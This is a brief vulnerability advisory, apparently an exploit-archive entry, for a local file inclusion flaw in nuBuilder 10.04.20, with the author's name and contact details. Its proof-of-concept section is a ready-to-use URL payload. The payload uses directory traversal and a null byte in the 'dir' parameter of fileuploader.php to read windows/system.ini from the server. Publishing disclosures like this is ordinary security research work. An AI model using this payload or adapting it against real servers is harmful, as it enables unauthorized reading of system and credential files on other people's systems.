21 lines
No EOL
857 B
Text
21 lines
No EOL
857 B
Text
------------------------------------------------------------------------
|
|
Software................nuBuilder 10.04.20
|
|
Vulnerability...........Local File Inclusion
|
|
Download................http://sourceforge.net/projects/nubuilder/files/
|
|
Release Date............7/5/2010
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................John Leitch
|
|
Site....................http://cross-site-scripting.blogspot.com/
|
|
Email...................john.leitch5@gmail.com
|
|
------------------------------------------------------------------------
|
|
|
|
--Description--
|
|
|
|
A local file inclusion vulnerability in nuBuilder 10.04.20 can be
|
|
exploited to include arbitrary files.
|
|
|
|
|
|
--PoC--
|
|
|
|
http://localhost/nubuilder-10.04.20/productionnu2/fileuploader.php?dir=../../../../../../../../windows/system.ini%00 |